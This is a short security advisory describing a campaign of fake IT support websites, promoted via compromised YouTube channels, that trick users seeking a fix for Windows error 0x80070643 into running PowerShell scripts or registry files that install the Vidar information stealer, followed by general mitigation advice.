Fake IT Support Website

Fake IT support websites have been set up to trick users into running harmful PowerShell scripts or importing malicious registry files. These scripts download Vidar, a type of information-stealing malware. This campaign is being promoted through compromised YouTube channels.?

Detailed overview?

Campaign overview?

The malicious campaign centers around fake IT support websites that pose as legitimate solutions for resolving the Windows error code 0x80070643. This specific error code is commonly encountered during Windows updates, and users often seek online help to fix it. Cybercriminals have taken advantage of this by creating fraudulent websites that offer fake fixes. These sites direct users to execute PowerShell scripts or import registry files that are supposedly solutions to the error but are actually harmful.?

Attack vector?

The primary method of infection is through PowerShell scripts and registry files provided on these fraudulent websites. When users run these scripts or import these files, they unknowingly download Vidar malware. Vidar is an information stealer that can collect a wide range of data from infected systems, including credentials, financial information, and other sensitive data. This stolen data is then used for further malicious activities or sold on dark web markets.?

Promotion and reach?

The campaign is promoted through compromised YouTube channels, which host videos that appear to provide legitimate solutions to the Windows error code. These videos often include links to fake IT support websites in their descriptions. The compromised channels lend an air of legitimacy to the scam, making it more likely that users will trust and follow the instructions provided.?

Malware capabilities?

Vidar malware, which is downloaded through these fake fixes, is a robust information stealer. It can harvest various types of data from infected systems, including:?

• Credentials: Vidar can extract login details saved in browsers and other applications.?

• Financial information: The malware can capture credit card details, online banking credentials, and other financial data.?

• Personal data: Other sensitive personal information stored on the system can also be targeted.?

Once the data is harvested, it is often sent to command-and-control (C2) servers controlled by the attackers. This data can then be used for further attacks, such as identity theft or financial fraud, or sold in bulk on dark web marketplaces.?

Mitigation and prevention?

To mitigate the risk posed by this campaign, users are advised to:?

• Verify sources: Always verify the authenticity of IT support websites and YouTube channels before following their advice.?

• Avoid running unknown scripts: Do not run PowerShell scripts or import registry files from untrusted sources.?

• Use security software: Employ robust cybersecurity software that can detect and block malicious activities.?

• Stay updated: Keep your system and software updated to protect against known vulnerabilities.?

Cybersecurity professionals also recommend educating users about the dangers of following advice from unverified sources and encouraging them to seek help from official or well-known support channels.?

Conclusion?

This campaign is a stark reminder of the lengths cybercriminals will go to exploit common issues faced by users. By preying on those seeking help with a persistent Windows error, they have created a convincing yet dangerous trap. Users must exercise caution and skepticism when seeking online solutions, especially for technical issues. Staying informed and vigilant is key to protecting oneself from such deceptive attacks.?

?